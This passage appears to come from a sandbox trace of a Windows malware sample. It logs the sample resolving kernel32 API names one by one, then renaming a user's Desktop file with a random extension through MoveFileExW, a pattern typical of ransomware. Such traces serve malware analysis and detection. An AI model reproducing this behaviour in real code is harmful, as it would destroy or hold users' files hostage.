(lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.915] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.915] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.915] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.915] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.915] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.915] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.915] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.915] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.915] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.915] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.915] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.915] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.915] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.915] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.915] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.915] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.915] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.916] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.916] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.916] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.916] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.916] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.916] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.916] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.916] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.916] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.916] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.916] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.916] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.916] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.916] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.916] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.916] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.916] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.916] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.916] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.916] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.916] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.916] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.916] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.916] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.916] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.916] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.916] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.916] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.916] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.916] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.916] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.916] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.916] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.916] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.916] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.916] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.916] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.917] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.917] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.917] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.917] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.917] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.917] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.917] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.917] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.917] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.917] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.917] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.917] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.917] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.917] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.917] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.917] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.917] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.917] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.917] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.917] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.917] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.917] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.917] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.917] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.917] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.917] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.917] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.917] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.917] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.917] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.917] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.917] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.917] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.917] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.917] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.917] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.917] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.918] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.918] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.918] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.918] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.918] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.918] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.918] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.918] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.918] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.918] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.918] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.918] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.918] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.918] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.918] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.918] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.918] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.918] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.918] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.918] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.918] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.918] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.918] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.918] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.918] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.918] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.918] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.918] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.918] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.918] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.918] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.918] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.918] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.918] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.918] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.918] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.918] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.919] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.919] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.919] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.919] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.919] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.919] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.919] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.919] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.919] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.919] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.919] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.919] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.919] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.919] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.919] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.919] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.919] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.919] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.919] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.919] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.919] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.919] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.919] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.919] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.919] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.919] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.919] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.919] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.919] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.919] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.919] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.919] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.919] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.919] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.919] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.919] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.919] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.920] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.920] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.920] lstrlenA (lpString="DELETEATOM") returned 10 [0082.920] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.920] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.920] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.920] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.920] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.920] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.920] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.920] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.920] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.920] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.920] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.920] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.920] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.920] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.920] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.920] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.920] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.920] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.920] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.920] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.920] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.920] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.920] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.920] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.920] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.920] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.920] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.920] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.920] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.920] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.920] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.920] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.920] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.921] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.921] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.921] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.921] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.921] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.921] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.921] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.921] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.921] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.921] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.921] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.921] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.921] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.921] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.921] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.921] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.921] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.921] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.921] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.921] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.921] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.921] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.921] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.921] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.921] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.921] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.921] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.921] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.921] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.921] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.921] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.921] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.921] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.921] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.921] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.921] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.921] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.922] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.922] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.922] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.922] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.922] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.922] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.922] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.922] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.922] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.922] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.922] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.922] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.922] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5QUa1fvtx-.m4a") returned 52 [0082.922] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5QUa1fvtx-.m4a.KQqfPS") returned 59 [0082.922] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5QUa1fvtx-.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5qua1fvtx-.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS 